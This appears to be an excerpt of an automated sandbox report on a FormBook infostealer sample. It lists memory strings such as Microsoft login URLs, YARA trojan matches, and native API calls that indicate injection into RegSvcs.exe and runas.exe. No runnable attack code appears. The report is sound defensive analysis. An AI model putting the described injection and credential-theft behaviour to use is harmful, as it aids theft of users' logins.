                Source: runas.exe, 00000011.00000003.2796143486.0000000007823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: runas.exe, 00000011.00000002.3352619446.0000000002847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comB
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042BE53 NtClose,7_2_0042BE53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2B60 NtClose,LdrInitializeThunk,7_2_014D2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_014D2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_014D2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D35C0 NtCreateMutant,LdrInitializeThunk,7_2_014D35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D4340 NtSetContextThread,7_2_014D4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D4650 NtSuspendThread,7_2_014D4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2BE0 NtQueryValueKey,7_2_014D2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2BF0 NtAllocateVirtualMemory,7_2_014D2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2B80 NtQueryInformationFile,7_2_014D2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2BA0 NtEnumerateValueKey,7_2_014D2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2AD0 NtReadFile,7_2_014D2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2AF0 NtWriteFile,7_2_014D2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2AB0 NtWaitForSingleObject,7_2_014D2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2D00 NtSetInformationFile,7_2_014D2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2D10 NtMapViewOfSection,7_2_014D2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2D30 NtUnmapViewOfSection,7_2_014D2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2DD0 NtDelayExecution,7_2_014D2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2DB0 NtEnumerateKey,7_2_014D2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2C60 NtCreateKey,7_2_014D2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2C00 NtQueryInformationProcess,7_2_014D2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2CC0 NtQueryVirtualMemory,7_2_014D2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2CF0 NtOpenProcess,7_2_014D2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2CA0 NtQueryInformationToken,7_2_014D2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2F60 NtCreateProcessEx,7_2_014D2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2F30 NtCreateSection,7_2_014D2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2FE0 NtCreateFile,7_2_014D2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2F90 NtProtectVirtualMemory,7_2_014D2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2FA0 NtQuerySection,7_2_014D2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2FB0 NtResumeThread,7_2_014D2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2E30 NtWriteVirtualMemory,7_2_014D2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2EE0 NtQueueApcThread,7_2_014D2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2E80 NtReadVirtualMemory,7_2_014D2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2EA0 NtAdjustPrivilegesToken,7_2_014D2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3010 NtOpenDirectoryObject,7_2_014D3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3090 NtSetValueKey,7_2_014D3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D39B0 NtGetContextThread,7_2_014D39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3D70 NtOpenThread,7_2_014D3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3D10 NtOpenProcessToken,7_2_014D3D10
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04544650 NtSuspendThread,LdrInitializeThunk,17_2_04544650
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04544340 NtSetContextThread,LdrInitializeThunk,17_2_04544340
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_04542C70
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542C60 NtCreateKey,LdrInitializeThunk,17_2_04542C60
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_04542CA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542D10 NtMapViewOfSection,LdrInitializeThunk,17_2_04542D10
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_04542D30
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542DD0 NtDelayExecution,LdrInitializeThunk,17_2_04542DD0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_04542DF0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542EE0 NtQueueApcThread,LdrInitializeThunk,17_2_04542EE0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_04542E80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542F30 NtCreateSection,LdrInitializeThunk,17_2_04542F30
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542FE0 NtCreateFile,LdrInitializeThunk,17_2_04542FE0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542FB0 NtResumeThread,LdrInitializeThunk,17_2_04542FB0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542AD0 NtReadFile,LdrInitializeThunk,17_2_04542AD0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542AF0 NtWriteFile,LdrInitializeThunk,17_2_04542AF0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542B60 NtClose,LdrInitializeThunk,17_2_04542B60
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_04542BF0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542BE0 NtQueryValueKey,LdrInitializeThunk,17_2_04542BE0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_04542BA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045435C0 NtCreateMutant,LdrInitializeThunk,17_2_045435C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045439B0 NtGetContextThread,LdrInitializeThunk,17_2_045439B0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542C00 NtQueryInformationProcess,17_2_04542C00
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542CC0 NtQueryVirtualMemory,17_2_04542CC0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542CF0 NtOpenProcess,17_2_04542CF0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542D00 NtSetInformationFile,17_2_04542D00
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542DB0 NtEnumerateKey,17_2_04542DB0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542E30 NtWriteVirtualMemory,17_2_04542E30
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542EA0 NtAdjustPrivilegesToken,17_2_04542EA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542F60 NtCreateProcessEx,17_2_04542F60
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542F90 NtProtectVirtualMemory,17_2_04542F90
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542FA0 NtQuerySection,17_2_04542FA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542AB0 NtWaitForSingleObject,17_2_04542AB0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542B80 NtQueryInformationFile,17_2_04542B80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04543010 NtOpenDirectoryObject,17_2_04543010
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04543090 NtSetValueKey,17_2_04543090
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04543D70 NtOpenThread,17_2_04543D70
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04543D10 NtOpenProcessToken,17_2_04543D10
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023C8A20 NtReadFile,17_2_023C8A20
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023C8B10 NtDeleteFile,17_2_023C8B10
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023C8BB0 NtClose,17_2_023C8BB0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023C88B0 NtCreateFile,17_2_023C88B0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023C8D10 NtAllocateVirtualMemory,17_2_023C8D10
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437F92C NtMapViewOfSection,17_2_0437F92C
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_02782B170_2_02782B17
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_027874480_2_02787448
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_027801A00_2_027801A0
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_02780B600_2_02780B60
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_02780B5B0_2_02780B5B
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_0278734A0_2_0278734A
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F7D3C10_2_06F7D3C1
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F723B00_2_06F723B0
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F70AA00_2_06F70AA0
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F754580_2_06F75458
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F775300_2_06F77530
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F723710_2_06F72371
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F750200_2_06F75020
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F70A900_2_06F70A90
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F77A400_2_06F77A40
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F758900_2_06F75890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004030207_2_00403020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041699E7_2_0041699E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004169A37_2_004169A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402AEC7_2_00402AEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004044457_2_00404445
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042E4637_2_0042E463
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040FC037_2_0040FC03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040FE237_2_0040FE23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040DEA37_2_0040DEA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015281587_2_01528158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014901007_2_01490100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153A1187_2_0153A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015581CC7_2_015581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015541A27_2_015541A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015601AA7_2_015601AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015320007_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155A3527_2_0155A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015603E67_2_015603E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE3F07_2_014AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015402747_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015202C07_2_015202C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A05357_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015605917_2_01560591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015524467_2_01552446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015444207_2_01544420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154E4F67_2_0154E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C47507_2_014C4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A07707_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149C7C07_2_0149C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BC6E07_2_014BC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B69627_2_014B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A07_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0156A9A67_2_0156A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A28407_2_014A2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AA8407_2_014AA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE8F07_2_014CE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014868B87_2_014868B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155AB407_2_0155AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01556BD77_2_01556BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149EA807_2_0149EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AAD007_2_014AAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153CD1F7_2_0153CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149ADE07_2_0149ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B8DBF7_2_014B8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0C007_2_014A0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490CF27_2_01490CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540CB57_2_01540CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01514F407_2_01514F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01542F307_2_01542F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E2F287_2_014E2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C0F307_2_014C0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01492FC87_2_01492FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014ACFE07_2_014ACFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151EFA07_2_0151EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0E597_2_014A0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155EE267_2_0155EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155EEDB7_2_0155EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155CE937_2_0155CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2E907_2_014B2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D516C7_2_014D516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148F1727_2_0148F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0156B16B7_2_0156B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AB1B07_2_014AB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A70C07_2_014A70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154F0CC7_2_0154F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155F0E07_2_0155F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015570E97_2_015570E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148D34C7_2_0148D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155132D7_2_0155132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E739A7_2_014E739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BB2C07_2_014BB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015412ED7_2_015412ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A52A07_2_014A52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015575717_2_01557571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015695C37_2_015695C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153D5B07_2_0153D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014914607_2_01491460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155F43F7_2_0155F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155F7B07_2_0155F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E56307_2_014E5630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015516CC7_2_015516CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A99507_2_014A9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BB9507_2_014BB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015359107_2_01535910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150D8007_2_0150D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A38E07_2_014A38E0
